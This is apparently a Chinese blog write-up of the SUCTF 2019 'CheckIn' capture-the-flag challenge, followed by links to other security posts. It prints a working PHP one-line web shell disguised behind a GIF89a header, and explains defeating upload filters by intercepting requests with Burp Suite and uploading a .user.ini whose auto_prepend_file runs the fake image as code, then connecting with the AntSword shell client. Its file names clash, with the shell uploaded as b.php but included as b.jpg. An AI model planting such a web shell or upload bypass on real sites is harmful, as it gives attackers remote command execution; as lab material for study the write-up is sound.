[SUCTF 2019]CheckIn 1

解题步骤

  1. 上传木马图片,命名为b.php
xml 复制代码
GIF89a
<script language='php'>@eval($_POST['cmd'])</script>
  1. bp抓包,修改数据;然后可看到上传的文件

  2. 上传.user.ini文件,内容编写如下,然后bp抓包修改文件类型

php 复制代码
GIF89a
auto_prepend_file=b.jpg


  1. 可发现,刚刚我们上传的木马b文件被删除了,这里我测试了几遍,只要速度够快,两个文件能够同时存在,能够用蚁剑连接。


相关推荐
小春学渗透29 分钟前
Day107:代码审计-PHP模型开发篇&MVC层&RCE执行&文件对比法&1day分析&0day验证
开发语言·安全·web安全·php·mvc
超栈2 小时前
HCIP(11)-期中综合实验(BGP、Peer、OSPF、VLAN、IP、Route-Policy)
运维·网络·网络协议·计算机网络·web安全·网络安全·信息与通信
Wh1teR0se2 小时前
XSS漏洞--常用payload及绕过
web安全·网络安全·xss
易云码13 小时前
信息安全建设方案,网络安全等保测评方案,等保技术解决方案,等保总体实施方案(Word原件)
数据库·物联网·安全·web安全·低代码
Spring_java_gg16 小时前
如何抵御 Linux 服务器黑客威胁和攻击
linux·服务器·网络·安全·web安全
独行soc16 小时前
#渗透测试#SRC漏洞挖掘#深入挖掘XSS漏洞02之测试流程
web安全·面试·渗透测试·xss·漏洞挖掘·1024程序员节
newxtc17 小时前
【国内中间件厂商排名及四大中间件对比分析】
安全·web安全·网络安全·中间件·行为验证·国产中间件
mingzhi612 天前
渗透测试-快速获取目标中存在的漏洞(小白版)
安全·web安全·面试·职场和发展